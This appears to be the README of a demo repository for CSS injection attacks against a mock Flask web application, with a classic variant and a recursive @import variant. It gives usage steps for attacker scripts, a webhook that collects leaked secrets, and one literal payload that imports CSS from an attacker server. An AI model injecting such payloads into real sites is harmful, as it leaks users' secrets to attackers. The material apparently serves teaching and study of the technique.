/CSS-Injection

CSS Injection.

Primary LanguagePython

c5517n

CSS Injection.

Requirements

Click==7.0
Flask==1.1.1
itsdangerous==1.1.0
Jinja2==2.10.3
MarkupSafe==1.1.1
pyperclip==1.7.0
Werkzeug==0.16.0

pip install -r requirements.txt

Classic

Overview

An example of a classical CSS Injection attack. The attacker needs to have the user POST the attack vector every time.

Usage

  1. Run attacker/server.py and user/server.py.
  2. Run attacker/exploit.py.
  3. Post the attack vector generated by attacker/exploit.py to 0.0.0.0:8080, the leaked secret will be displayed on the console of attacker/server.py.
  4. Enter the leaked secret into attacker/exploit.py and continue the attack.
  5. Loop...

Files

  • user/server.py: Mock web application that has CSS Injection vulnerability.
  • attacker/exploit.py: Generates a CSS Injection attack vector and copies it to the clipboard.
  • attacker/server.py: Webhook to collect secret.

Recursive

Overview

An example of CSS Injection using Recursive Import technique.

Usage

  1. Run attacker/server.py and user/server.py.
  2. Post the attack vector: <style>@import url('http://0.0.0.0:8081/css/0.css')</style>.
  3. Leakage continues recursively due to CSS import

Files

  • user/server.py: Mock web application that has CSS Injection vulnerability.
  • attacker/server.py: Webhook to collect secret.
  • attacker/templates/tmpl.jinja2: Attack vector(CSS) template.

Reference

m---/onsen